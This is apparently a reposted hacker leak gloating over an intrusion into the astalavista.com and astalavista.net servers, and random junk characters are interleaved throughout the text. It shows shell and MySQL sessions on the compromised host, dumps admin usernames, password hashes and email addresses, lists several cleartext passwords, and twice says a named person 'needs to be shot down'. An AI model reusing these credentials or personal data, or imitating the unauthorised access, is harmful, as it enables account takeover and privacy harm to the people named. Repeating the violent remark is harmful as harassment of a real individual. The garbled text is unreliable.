$ }5 O0 h, W& h% A- R+ s% x <link>http://www.astalavista.com/exploits</link>% t4 Y4 \* r* a5 n0 @
<description>All availably Exploits.</description>
& {9 a- K1 d9 A ~* _3 M4 X; i/ r <language>en-us</language>
; D7 T9 S5 ?( ?' A3 S* ?: n <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
8 U% y: _ z& U; W& F) Y% K& t% N <docs>http://blogs.law.harvard.edu/tech/rss</docs>
7 S5 J& s0 u, u- T+ X2 c L <generator>Astalavista.com</generator># b7 ^4 P/ a A& v
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
, t& D) i- e: K$ i2 p0 B7 c3 w </channel>
8 {2 r+ L6 W- O/ T, W; R( \7 o$ a</rss>’;# p' v, D0 n$ {" r
/ t" r' A U# z0 o
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {8 S; ~8 X; f- R% @8 R
unlink (FULLPATH . ‘/feed/exploits.xml’);
7 p0 s* G- T2 ^, k/ l& h }
& F% }2 K0 B! @' J* Y" S' M8 T0 @6 b- G$ q
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
$ z7 D1 L* u( r4 Q& p1 V1 h[snip]2 Z+ @! s$ n& `' c
8 |' q) e( U: K, a& ]sh-3.2$ cat exploits.sh
* C& y, T& _1 Z9 x/ B#!/bin/sh) A: H- [8 r( \$ q' m- c
8 L* @, ^+ @- j$ C: {: N) ?###########################################################
+ f% l/ A( ]- C9 r, D! t# #
* |9 ^8 `1 r1 c( }# Title: milw0rm exploits adder #
3 t3 F/ v5 L/ ]! s, r( c2 L" x- g# Description: Add all milw0rm exploits to the #9 S7 l6 B7 x4 H3 @
# Astalavista.com database #0 Q6 y+ t8 C. g) i' Z0 \1 G
# #( t2 U8 i" B+ I1 ~: I
# Company: Astalavista Group #
% ]( Q9 ? R5 }: p# Author: Paulo M. Santos #! ]2 }+ v z- W7 _# }' b. ^
# E-Mail: 链接标记paulo.santos@astalavista.ch #% ^" w6 k# v* n# L, j1 ]# _1 ^0 B
# #
: V% J7 U4 M" Q% n, F###########################################################% |0 \+ O+ C3 c" j5 b1 u4 u
& W" ]6 _( W9 M7 I& i$ V
# path
6 y, ?5 }1 a9 N; U! H1 D# R" k% @this_path=/home/com/public_html/modifications/cronjobs: z! @+ g* I& f* M2 \
) |! ~0 ?- I: F0 b; k
# change directory
6 W$ i8 z/ E0 z) L" ^cd $this_path {9 s7 ~3 m8 w6 {2 G, r$ o
cd tmp/
. {& a) q" G1 Z* v. I) f! P! T- ?; w: B% ?( v7 v
# delete files. t, k. ~* m/ h |* x
rm -rf milw0rm.tar.* &, A i% n2 S( V$ x: Y. Y: Y
rm -rf milw0rm/ &* P: ^# p% ^+ D0 F' d D7 }5 @
/ Y( x- l) d' i$ W2 P$ g# b* B
# wget milw0rm paket
) `: D4 e" v- a+ L. W' w4 B( H awget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]# d; N0 M8 L' {) I" n: Y+ X* F/ D- [
T+ W* S2 s, U
# extract milw0rm paket: O& x. [: |. z% ^! G
tar -xvf milw0rm.tar.bz2
& W* z9 I A; u7 b% G' [% ~! b7 t. f6 U! g6 ?" P" j, B
# change owner
$ T5 x' d7 ~- P4 u. M9 @, i bchown -R com .7 V! q) t% P* x3 X6 p, B4 d
chgrp -R com .$ z7 b* \! O2 M% b3 p
5 k0 ]8 `* [) i5 K8 ^( A8 R
# execute php script3 b0 r6 G1 e+ a; P. |; b
cd $this_path
! f. N; X* q" a0 A0 Mphp -q exploits.php
& [) I4 q; r/ [7 N; e, I: A9 x |: o6 d S: H3 h
# delete files* Q% Y& y) P" T. [; P
rm -rf tmp/milw0rm.tar.*8 [+ j7 n/ x, _, } C9 u
rm -rf tmp/milw0rm/
3 b" n2 b& i( h0 t" Y1 N
8 B! K' V1 A+ u+ z* O6 ]sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
$ s- K2 g$ K& g, a! P2 w3 iPaulo M. Santos needs to be shot down.
6 P( H4 m( T2 g
1 q9 \" Q) H& w" jmysql -u contrexxuser2 -p
2 O3 u# D# }& H- p0 WEnter password:
9 d1 z8 Q( |6 c# T8 M& FWelcome to the MySQL monitor. Commands end with ; or \g.
; @4 B+ k2 _: S" |! a: ^6 eYour MySQL connection id is 261694# y9 S* Z& h0 o" G g* [
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
, g3 R) o: A* m0 y% J2 @2 E/ f
6 M" w; w! X# [- ]5 }) |Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.' C+ R( U' |. M; T
6 n/ `/ l: h! @, H: ?. h
mysql> show databases;
1 r7 X2 `5 ^' ~' x+——————–+6 P6 F! d* Q& V: @' ~
| Database |
" H( ~: u: i% |( a" E2 z9 ]4 |9 g F+——————–+) M* H3 P9 |* g& ^
| information_schema |# ?6 S( o5 M+ {7 j; {
| com_contrexx2 |
1 U9 e3 v* |2 A) W& i; L6 e4 F| com_contrexx2_live |
3 s) f0 R% ?$ }1 _# d3 V( @| test |
& W. C' |( U' ?* A3 `' @+——————–+) ?" i* B8 J0 v K0 @9 n& \
4 rows in set (0.00 sec)
) X: q& e" m' {8 P* w6 P
: Q% F" _( H6 l( smysql> use com_contrexx2_live( t* l& {1 [. D- C8 Q- `9 c; ^
Database changed4 R1 s# b" Y; x! t8 ]' [. \
mysql> show tables;
, H M2 C) ]. V- H2 u$ A+————————————————–+4 g r; B* s$ U+ j. b: L: C, p
| Tables_in_com_contrexx2_live |: n8 h9 D4 {; s# L5 L% i
+————————————————–+
2 Q% h# T8 b% r6 G| cc_banner_counter |6 J8 _1 A/ `) p- T7 \/ ]7 @
| cc_search_counter |
8 e# ]1 S9 g$ R' M| contrexx_access_group_dynamic_ids |1 m* [6 T: J1 V8 m
| contrexx_access_group_static_ids |
/ P/ u- Z2 T: y/ s. B, E2 A| contrexx_access_rel_user_group |4 n; ^7 x- F5 u( `9 p ?, C1 A( T4 V
| contrexx_access_settings |
% u* f$ ~+ g2 s# G| contrexx_access_user_attribute |
; n& `0 K7 P# m| contrexx_access_user_attribute_name |
0 C# `6 W) c+ z$ n: d; t| contrexx_access_user_attribute_value |( e9 A) p& W5 T) c5 X
| contrexx_access_user_core_attribute |
9 z* U9 J3 r3 R4 h: G' a| contrexx_access_user_groups |
+ {/ z9 O/ A7 o+ i% o' F z' i4 J) P| contrexx_access_user_mail |* |2 x1 x) g0 c5 \
| contrexx_access_user_profile |
8 y. W1 n2 R# k/ a, ]3 \7 C| contrexx_access_user_title |; b' S7 V0 O5 _: K+ G3 w
| contrexx_access_user_validity |
0 N( a+ W% |% m4 D| contrexx_access_users |
9 t5 c& s2 v F* U# l8 n3 ~) `| contrexx_backend_areas |
2 Z* w5 n9 a5 Q0 A& a/ c| contrexx_backups |* h9 A) t. I# @! S' t
| contrexx_content |% _' G1 e! z0 `
| contrexx_content_history |
$ M5 I/ m: b- Z| contrexx_content_logfile |
- b4 E( y; ?% s5 z- ~* r! b# }| contrexx_content_navigation |
% n3 X' O$ m4 {$ W| contrexx_content_navigation_history |
$ m* C( `6 k4 S J( |; N) I| contrexx_ids |! a! U3 R7 C5 n& x
| contrexx_languages |9 I2 H) m) d# \ B
| contrexx_lib_country |0 ~+ Q) y" O6 `7 q6 ~5 }
| contrexx_log |& P" d+ }" \# k) z( u- n
| contrexx_module_alias_source |) z0 V: R$ g5 ?/ S m; n6 F
| contrexx_module_alias_target |
l, P- A( c: H* Z1 T) z; ~! I| contrexx_module_block_blocks |; j4 |1 x+ |9 V7 v1 L4 w2 n
| contrexx_module_block_rel_lang |7 I1 @ O& u0 S7 r2 H2 J
| contrexx_module_block_rel_pages |2 w; J9 ~* ~; u$ `3 B
| contrexx_module_block_settings |( `8 K7 q1 h. @1 z
| contrexx_module_blog_categories |6 s+ z; b4 W- @3 M6 P7 m
| contrexx_module_blog_comments |3 N" a& g- g0 W4 p7 c) W1 Y" x/ s2 b
| contrexx_module_blog_message_to_category |. L$ K( R* g/ e6 H& z) m# j5 m& e
| contrexx_module_blog_messages |& K8 `! Q$ U+ ?; z0 v( L
| contrexx_module_blog_messages_lang |, i! ]* x! p) X, _ v7 y& K
| contrexx_module_blog_networks |
0 N. E2 D7 \7 q' E d" d' K8 F: I| contrexx_module_blog_networks_lang |
( [7 U/ S* [$ I+ N+ V: |# ?$ A1 T| contrexx_module_blog_settings |% o8 d- s1 ]' \0 c8 E/ l
| contrexx_module_blog_votes |
/ B4 s. _$ ?+ k7 G. K. f- H. w; s| contrexx_module_calendar |- o, i N; y: C- m* r/ ^3 L* Z
| contrexx_module_calendar_access |
* Z* J4 ?, Q- h| contrexx_module_calendar_categories |
5 o: q1 K+ K2 |9 v; B5 w& G% B# R| contrexx_module_calendar_form_data |
8 H, F9 R; o. ^8 }| contrexx_module_calendar_form_fields |+ I( U# E% V' D L' D, S
| contrexx_module_calendar_registrations |7 x9 X7 n8 k% u& R, `* y* V
| contrexx_module_calendar_settings |
9 F$ ]' j e) k* L| contrexx_module_calendar_style |5 B/ A; P/ h! ^# Y7 B9 r
| contrexx_module_contact_form |+ L; k/ r0 ^# v
| contrexx_module_contact_form_data |
, \. D; \6 c) L( l2 Z) Z| contrexx_module_contact_form_field |
8 s4 z; O. _+ ^: p| contrexx_module_contact_settings |
3 D9 S$ F! d' |" a| contrexx_module_data_categories |# ^) c: j+ w( Y; W
| contrexx_module_data_message_to_category |; _1 i( w$ x O$ f/ x0 X
| contrexx_module_data_messages |! l6 z$ S" K# `) a2 V( r8 ^. J& D
| contrexx_module_data_messages_lang |
0 |/ ^8 i- f: [| contrexx_module_data_placeholders |( H5 I `% V5 |+ B. V
| contrexx_module_data_settings |- r" V/ D \2 d5 q
| contrexx_module_directory_access |
. S) Y4 f& g. @% @; g$ a| contrexx_module_directory_categories |
" A; c+ G* B3 U+ Q5 ?9 Z| contrexx_module_directory_dir |) |0 G& H% q: w4 M/ ]' i( y I
| contrexx_module_directory_inputfields |$ r5 W+ Z3 }' g, C" ~" ~
| contrexx_module_directory_levels |; q7 ~. M0 { B- s
| contrexx_module_directory_mail |. {& }% z4 X1 i+ b3 P
| contrexx_module_directory_rel_dir_cat |
1 `1 J7 r9 q$ ?6 Q| contrexx_module_directory_rel_dir_level |3 }( n* z/ j$ f3 X7 Q
| contrexx_module_directory_settings |+ m7 L3 U L4 E5 f L
| contrexx_module_directory_settings_google |
( y0 J! A" l A4 C ^/ L| contrexx_module_directory_vote |
3 d7 F6 r: f! U3 a' ^| contrexx_module_docsys |& Z1 S& S; d) F1 K& h8 ]4 M+ F0 S
| contrexx_module_docsys_categories |: ~, ^3 K0 f; W' \
| contrexx_module_egov_configuration |7 Q* c# M4 z2 l) `6 {- b+ A
| contrexx_module_egov_orders |! _5 v# {7 L! n( O9 p, n6 o
| contrexx_module_egov_product_calendar |7 Z0 }- k8 I# {; A4 P
| contrexx_module_egov_product_fields |
, I E4 ?1 u1 D. R6 ^" g| contrexx_module_egov_products |
+ a$ U4 Y3 `' A5 G& s9 `| contrexx_module_egov_settings |
6 u! e7 B: T0 r2 r2 O1 e5 r, l| contrexx_module_exploits |
3 G' h& d( ?! ~5 X3 O7 J| contrexx_module_exploits_categories |* G# q- r5 ?$ q; a
| contrexx_module_feed_category |( e' ~( j3 C# o
| contrexx_module_feed_news |/ ~1 A0 \* [, D
| contrexx_module_feed_newsml_association |
+ R" Y! e- g" z6 h* k: d4 o7 _| contrexx_module_feed_newsml_categories |
3 Z8 h3 l1 X. }7 D' s. \+ C% e| contrexx_module_feed_newsml_documents |+ G) g* R i- S: g- b9 {
| contrexx_module_feed_newsml_providers |
$ N' {0 |# n0 X* h" u* j| contrexx_module_forum_access |
- K% v# E# j5 j$ i- Y3 B| contrexx_module_forum_categories |( o0 Y& j6 Z ~* ~* U7 W8 Y
| contrexx_module_forum_categories_lang |/ P3 l* h3 p1 i3 {# B; K
| contrexx_module_forum_notification |8 w, y- C4 P1 u( n3 w
| contrexx_module_forum_postings |% u. x3 O* |: v C- T" }6 h
| contrexx_module_forum_rating |! A$ F$ C/ X9 k+ E# L
| contrexx_module_forum_settings |
; U, `1 l% ~% U( V| contrexx_module_forum_statistics |
% N: m- B5 P3 E2 ]| contrexx_module_gallery_categories |
3 ]# e0 M4 D/ m3 l) U3 e: o7 F' ?| contrexx_module_gallery_comments |4 Y' B1 [ p7 V/ y; n1 H
| contrexx_module_gallery_language |
& k# F1 h' m s! O$ B0 m- x| contrexx_module_gallery_language_pics |
s' K/ {/ d& M0 E- e| contrexx_module_gallery_pictures |
# @# n4 K* I% F6 N* X9 h' B5 O| contrexx_module_gallery_settings |
6 L( E/ J$ A6 a7 l* y1 X; r; D| contrexx_module_gallery_votes |
1 ?- @7 p* w) C" M| contrexx_module_guestbook |
9 x& d7 E( z M( p( F, ]9 I$ }3 S| contrexx_module_guestbook_settings |
8 }5 S7 x: M9 X# w; N+ j5 d| contrexx_module_livecam |
& @( ~ f. Y9 T: i| contrexx_module_livecam_settings |) D* U% A& |/ K9 S4 u( p) Y& b4 D
| contrexx_module_market |
* Y5 M6 @1 E9 n- R a* m9 j| contrexx_module_market_access |$ G6 g6 R7 r. y6 y" w" a' O# }
| contrexx_module_market_categories |3 w3 O$ _3 |6 K, y% P. k( Z8 b. H
| contrexx_module_market_mail | {7 \$ G7 V6 \9 W
| contrexx_module_market_paypal |5 o, v0 N) Q8 a8 ]( r5 q8 |
| contrexx_module_market_settings |
0 V7 X: a' Q d, F3 J& m) l| contrexx_module_market_spez_fields |' p* O" ?8 c2 V) |8 [" t
| contrexx_module_mediadir_access |
2 @. V! E; [. b/ M! F& t| contrexx_module_mediadir_categories |& m+ h% a9 ^/ {6 n
| contrexx_module_mediadir_comments |# v+ X$ {% S0 ]9 z7 R4 I4 S
| contrexx_module_mediadir_dir |
# J3 u) P4 H; u% [| contrexx_module_mediadir_inputfields |
$ @6 {( n- ^+ K% R' `+ f1 ?8 ?$ k| contrexx_module_mediadir_levels |; c; p0 [6 W* l. {1 n0 }$ e! `3 ?
| contrexx_module_mediadir_mail |
; H) o. \; P- w& c( L' M| contrexx_module_mediadir_rel_dir_cat |
9 h) m# `9 d# w, q/ {" T| contrexx_module_mediadir_rel_dir_level |
3 I" C5 X/ E0 o8 ]; ?" Q| contrexx_module_mediadir_reports |1 P$ c0 j$ C; I" ]
| contrexx_module_mediadir_settings |
- Z* w8 z4 G# T& x| contrexx_module_mediadir_settings_google | _! X4 w9 |* S4 p4 b4 ^/ ]
| contrexx_module_mediadir_vote |1 D( N q" X# I% K/ j
| contrexx_module_memberdir_directories |' ]/ X) Y: e& P
| contrexx_module_memberdir_name |
, d s( o2 x& |$ ?| contrexx_module_memberdir_settings |
* w/ V) l+ T+ W/ ]( S| contrexx_module_memberdir_values |
7 i0 u( S( q( B4 g6 L* w| contrexx_module_nettools_allowed_groups | k9 s3 \0 [1 T5 l3 _
| contrexx_module_nettools_settings |
Z# x5 k! A. J0 ~- H| contrexx_module_news |
: W1 S7 B& h; B0 }; Z5 G) p| contrexx_module_news_access |
' e3 e' ]% G, U5 ~- q: d v| contrexx_module_news_categories |6 V+ D6 ^# _5 f
| contrexx_module_news_settings |) R# G4 x$ |$ c& r3 ` B
| contrexx_module_news_teaser_frame |
4 Y; g; K. i1 m! M- k| contrexx_module_news_teaser_frame_templates |5 @# M( v$ y2 A" L9 s4 O
| contrexx_module_news_ticker |
6 b1 S. k, x# Q5 b+ R| contrexx_module_newsletter |1 r1 m6 T: X" y" a( s8 z
| contrexx_module_newsletter_attachment |
% q* H! r& G: R: T| contrexx_module_newsletter_category |# x9 ^' [" D4 u d! Q
| contrexx_module_newsletter_confirm_mail |2 M, B6 @- T0 J7 a& c
| contrexx_module_newsletter_rel_cat_news |
8 y: f; q9 d* S# u. Z/ p- Q7 T| contrexx_module_newsletter_rel_user_cat |8 k6 w5 b" n4 S7 N4 m
| contrexx_module_newsletter_settings |. p% z) g: c, f
| contrexx_module_newsletter_template |
- t# C& d9 J( U! Z6 C0 H5 u| contrexx_module_newsletter_tmp_sending |0 Q7 U# S& t1 J
| contrexx_module_newsletter_user |
J& R2 J9 Z$ T9 H( F- z- o3 w8 r| contrexx_module_newsletter_user_title |
9 H2 I8 } r, x- h" L* s+ w9 [| contrexx_module_onlinetools_defaultports |
- {: A, K* g! d) y| contrexx_module_onlinetools_defaultports_back |
5 a' R; e" F+ _| contrexx_module_onlinetools_geolitecity_blocks |. C, d3 Z2 p! p$ @7 _
| contrexx_module_onlinetools_geolitecity_country |
9 M; ~9 M3 z" ?| contrexx_module_onlinetools_geolitecity_location |1 K2 S' h/ k- }( d
| contrexx_module_podcast_category |3 s, N' H0 V/ f/ E+ z
| contrexx_module_podcast_medium |: `9 b* ]$ s) d% K/ V P# w
| contrexx_module_podcast_rel_category_lang |
8 q) b8 f$ y# c! V8 m% E4 C| contrexx_module_podcast_rel_medium_category |
/ f/ t4 a# j! || contrexx_module_podcast_settings |% i5 d3 X& x2 j3 n' _3 z
| contrexx_module_podcast_template |
/ \+ g% W4 \( q; `5 Z| contrexx_module_proxydb |5 P! s3 O+ n$ x1 e* @3 p; ] F
| contrexx_module_recommend |
! Q* @ }; l0 X Y7 c a( k| contrexx_module_repository |. X; a& {% R, E3 I* J2 [5 F. I
| contrexx_module_securitynews_cats |1 {0 z; M/ N, g/ `, I
| contrexx_module_securitynews_feeds |, d! i- U4 V3 Q. N7 X9 W
| contrexx_module_securitynews_news |
- Y* Q* t* ^9 ?2 Y9 g) a| contrexx_module_shop_categories |
" N7 }. I2 I& A: I) I4 M| contrexx_module_shop_config |- D( j C, c- s) t" v" Q9 Y! z8 H
| contrexx_module_shop_countries |
; L8 A" |9 {. p" ~2 |0 k7 c7 n# z+ Z1 a& L| contrexx_module_shop_currencies |
/ y7 f6 K7 V! L, Y X6 H' y8 d| contrexx_module_shop_customers |6 P) |# \9 r9 g5 f7 F' N7 T6 ?
| contrexx_module_shop_importimg |
* Q$ f# m# b' t6 I$ l U" w0 [| contrexx_module_shop_lsv |
$ l! C! \9 W( c| contrexx_module_shop_mail |4 u$ O& f$ ~( I# v) j: d s
| contrexx_module_shop_mail_content |% ?+ p+ I& U) [. |7 b# }
| contrexx_module_shop_manufacturer |5 ~. ^( z; j6 ^. e+ O5 X
| contrexx_module_shop_order_items |. I- E- J# Q) ]( k- l ]$ o
| contrexx_module_shop_order_items_attributes |$ H5 M! E) E$ F% E3 A6 K* u
| contrexx_module_shop_orders |! N5 Q6 J* M8 N# P3 l* c
| contrexx_module_shop_payment |
9 l; p/ k {! l U, u ]| contrexx_module_shop_payment_processors |
; [% C* v/ l) G9 v3 f| contrexx_module_shop_pricelists |
0 }. ?3 y3 a* P: _ x/ K4 j: a| contrexx_module_shop_products |
8 D) Z% {! @: {| contrexx_module_shop_products_attributes |
' _( |5 b' B' j9 X; K| contrexx_module_shop_products_attributes_name |$ R3 y( g% E* R# s. _ X
| contrexx_module_shop_products_attributes_value |
5 T; @, r4 v: N6 w0 y| contrexx_module_shop_products_downloads |, a2 A) i4 S: k8 A0 B
| contrexx_module_shop_rel_countries |2 n& ~5 i6 \& P% R0 L; \" [
| contrexx_module_shop_rel_payment |, p+ q! p1 p" g9 G1 j& P5 P
| contrexx_module_shop_rel_shipment |
. S9 p& _# }6 o5 K| contrexx_module_shop_shipment_cost |
$ t' }/ y" [) r| contrexx_module_shop_shipper |
( T- [( P+ u" k2 I9 f. n8 X| contrexx_module_shop_vat |
/ F7 m: Q$ h- B$ B+ A| contrexx_module_shop_zones |
1 x5 ^' X9 ^6 Q7 c* E2 m3 N| contrexx_module_u2u_address_list |
5 p4 G$ ^. q/ ]| contrexx_module_u2u_message_log |
+ z8 _6 d- i! N/ M9 {' m8 {| contrexx_module_u2u_sent_messages | a6 r u0 p v4 ]1 E' o* d. c8 m
| contrexx_module_u2u_settings |4 B' R4 E3 o+ \( D
| contrexx_module_u2u_user_log |
, O8 N6 y3 |! y1 e2 {| contrexx_modules |" w4 e4 ^9 P# o, U6 v
| contrexx_sessions |5 ?) B k9 p3 R' R, q
| contrexx_settings |
( I R1 @7 A* s! C- Q0 e! Z! ~| contrexx_settings_smtp |2 O) i. n. K+ @ D2 ~$ r
| contrexx_skins |6 ^2 r2 I3 h2 W) o- K! E8 \3 o
| contrexx_stats_browser |
' o0 \( A1 L. d| contrexx_stats_colourdepth |& r3 _; R1 X: k% }
| contrexx_stats_config |9 |1 U; G/ V7 {+ c/ w$ k+ d8 e9 |
| contrexx_stats_country |
1 _/ m2 d- E; j0 a7 }0 V& Z| contrexx_stats_hostname |
1 u" W. o# b0 ^& ^| contrexx_stats_javascript |
% B6 ]" ~( |6 [" N' ?| contrexx_stats_operatingsystem |
9 h. H5 z$ y* j# U$ p4 \| contrexx_stats_referer |! h* R! D v* N- F
| contrexx_stats_requests |7 b K+ \1 P3 H: X* J
| contrexx_stats_requests_summary |. l3 s' C+ Y7 s% P1 A7 C
| contrexx_stats_screenresolution |
0 a( P5 V5 ]/ V. @, S1 i# t7 R| contrexx_stats_search |( O, v- Q3 B: ~$ W1 D9 v
| contrexx_stats_spiders |
. ~, k8 z& j7 w" _, y R2 {# _1 O- j| contrexx_stats_spiders_summary |
8 d! y/ D$ U/ {$ B( `% q| contrexx_stats_visitors |% Y, n. }: z2 z4 N2 ~" M+ C3 }
| contrexx_stats_visitors_summary |
* \3 p* x$ M" _| contrexx_voting_additionaldata |
8 W: L; z! J& ]6 N| contrexx_voting_email |
5 D, `, B2 a+ V' O| contrexx_voting_rel_email_system |; s) P3 f2 X6 s. N
| contrexx_voting_results |
6 p+ x8 e, Z2 g, ?7 p| contrexx_voting_system | [- @5 F; U8 I! d4 S
| foo |
M x; L' I! T+————————————————–+
( c9 Z; o0 B' V' S0 a, C; B* E! O227 rows in set (0.01 sec)
7 _6 |, P3 Q. X8 e* P7 f& O {# A' k- q! g4 R
mysql> select count(*) as skids from contrexx_access_users;8 F8 [ l. f) E% `
+——-+2 y2 T/ h/ N/ h0 M( _3 ?
| skids |+ K$ E( ~% Z6 V" t/ j
+——-+
- g& B7 v( t: Y' X- _$ J5 z2 b$ G. {| 53699 |6 x# j& s5 q% X0 Q, G
+——-+0 }0 L) G2 Y0 Q
1 row in set (0.00 sec)
, u! r( O* }! t- Q% ?' p( ^5 {) a, T5 e+ b% X
mysql> describe contrexx_access_users;/ J' |. o8 ?, P2 B6 `; B3 f3 X
+——————+——————————————+——+—–+————–+—————-+
, N, x0 o1 G5 Q* m9 W5 M. Q, i| Field | Type | Null | Key | Default | Extra |
9 J7 [. u, Y. _( @; a4 a+——————+——————————————+——+—–+————–+—————-+
. H! I! j: ] e- {3 W* ], k( a| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 a" S) A8 R2 D. U| is_admin | tinyint(1) unsigned | NO | | 0 | |0 u- k+ I g- `) t8 G! ?
| username | varchar(40) | YES | MUL | NULL | |% s& a% j: ]* {% u
| password | varchar(32) | YES | | NULL | |
, r/ J3 N5 f% ?: ~' x& [| regdate | int(14) unsigned | NO | | 0 | |6 y8 v- P6 M Z+ z# ?0 t ?
| expiration | int(14) unsigned | NO | | 0 | |, t; N# Y: m( ~( l* l$ G3 ]$ g
| validity | int(10) unsigned | NO | | 0 | |
" s4 L( u+ V( g& t6 A| last_auth | int(14) unsigned | NO | | 0 | |: ?/ U* C( O+ B5 P/ h& N1 Y
| last_activity | int(14) unsigned | NO | | 0 | |! N" W5 c, g$ f) \ X; u
| email | varchar(255) | YES | | NULL | |7 ^1 ~+ ^. l5 y' ~# G7 w( Q' N5 e
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
4 v( o( t* E; F; L" r1 @| frontend_lang_id | int(2) unsigned | NO | | 0 | |5 ]+ _& G7 o+ v( O# M
| backend_lang_id | int(2) unsigned | NO | | 0 | |
* o& w0 U! N- s4 M$ `| active | tinyint(1) | NO | | 0 | |) Z2 F# D& e1 F& ? f
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |/ S4 B$ D( U4 ^( G& f
| restore_key | varchar(32) | NO | | | |2 G, W1 u! m3 ?$ U% j0 z6 d
| restore_key_time | int(14) unsigned | NO | | 0 | |
9 ^; o7 e# r8 @7 T| u2u_active | enum(’0′,’1′) | NO | | 1 | |0 T P/ u t: { S2 _- F7 T
+——————+——————————————+——+—–+————–+—————-++ n- P3 d6 {+ _; @
18 rows in set (0.00 sec)
/ q1 }' u! e+ J5 |! f1 F+ l
; ^( x& c+ U3 V9 Q2 W5 G, p! G* Tmysql> select username,password,email from contrexx_access_users where is_admin = 1;
4 I; H. r7 C4 K+————+———————————-+—————————–+
# j) R# J$ q X: H1 c1 x& C2 f1 Y( t| username | password | email |# ?& \% ?7 D% n, Q3 _
+————+———————————-+—————————–+$ E6 p: i/ v+ [7 z/ c: x1 l
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |$ Q) ?7 r- r u Z$ P f; a. J9 a
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |: o6 S3 x. V: d4 [9 K$ X+ t$ d
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |3 W# r$ ]( o* m- I. I
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
2 h1 F) b6 U" O+————+———————————-+—————————–+
7 E+ [. t" d0 d0 N; ^ `( A4 rows in set (0.04 sec)9 O. H5 w5 [7 `# P8 f1 A% W% o
6 ]$ q8 X2 s* F; j2 {! h
mysql> exit;2 A- g# W# ^9 H) d3 t. q# R
Bye' ]' g7 \5 X Y+ z
! f+ w+ X. n/ c' [; h: K
[~] There you go, your “team of security and IT professionals” is a joke.
# T, e1 I0 ~: O% o0 K6 F6 S
/ u/ n# M) r& x4 j6 c) d+——————————+. g+ S! ?) V, \8 l; E! ]
system:f82BN3+_*
5 d7 f8 a Q) |$ I5 ?Be1er0ph0r:belerophor4astacom
4 V6 H( L8 h/ C3 tprozac:asta4cms!
5 g$ ^, i) b5 \+ ^commander:mpbdaagf6m" m( h) q* c* p' m' _
sykadul:ak29eral U7 G, \- _8 }
+——————————+
t; F {' i; g0 `6 r+ ]1 w3 i* t( `( V ~$ ^0 j* @
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
Y% R' E/ U6 L…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
9 ?' x% T8 F' k5 i t1 P( ?+ r0 J& m6 K9 S2 K: f) d& ?
[~] Lets move to astalavista.net now,
. r+ i1 v; V* T1 B9 M) l5 V: W! M6 T( t5 i
From <链接标记[url]https://www.astalavista.net/[/url]>:
/ u! v# C, S3 ^/ k9 [>> Everyone knows that the best defense is a good offense.' ` C2 n0 ?" W* o6 C- |. S, @
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy. Y. W( r5 M3 L2 v* [
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world. B3 C9 J6 Y: ?
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”4 p* X f1 `, e, Y9 V7 ? j- C' \
5 K6 q! f8 a8 y r; u! d$ N# |
>> Go ahead, try and hack our server . in a completely legal way!6 A! h3 @: g8 F& N# x
>> Learn by doing: We offer our members tricky tasks and challenges on an
4 `9 l- Q( w8 r. e6 Q+ o9 a>> ongoing basis so you can test your knowledge and abilities. You can also
1 _5 m9 |2 X5 O. q>> demonstrate what you.ve mastered by taking part in regular hacker contests5 k. A. H i3 g
>> and war games
) i q+ f, _( `+ N: F9 h$ X5 q7 ^( A1 Y2 [! x3 c' M C1 D/ d) U1 ]
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!% e9 Z2 D! W. G8 `
) ?' ?. Q' Y% v/ F
[-] Tricky task: Find home dir of astalavista.net6 t4 w( V8 C& S% \& P
1 B& k$ ]0 Q% ]" \. T2 d' X
sh-3.2$ ls -la ~astanet
, u; Y/ E! m2 S5 h- }3 ~total 48
) ^; p+ g& M- m: j0 ]/ Qdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
4 U. ~$ z4 }2 q% y& ?drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) A) c& X/ X' P
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
; w7 N6 ]' [- g1 x6 @1 l ^, }-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
* j; y' |) A* S% `' J; t7 R$ N' ` H-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
2 o8 U1 K5 g' r$ B6 V-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
/ V8 N& c) r* `; A. y; o-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc# L7 w% L% d+ [6 h; r: D5 Q( i
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains3 ]# l+ k7 a* K, N" @
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap2 i7 d9 E& O' B4 r5 C+ U
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
# \% v: |5 u; A1 v4 ?/ blrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html1 f$ \) j9 U+ Y, G" v& i
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow$ v# h* o6 W M+ ~1 C }$ U
4 R% a* Y" q( ^- h0 w5 Vsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/) ?+ V* o. i# r( Y) l7 L# c
sh-3.2$ ls -la
. |1 B; O4 X9 {9 ?$ U! B: N" Rtotal 200
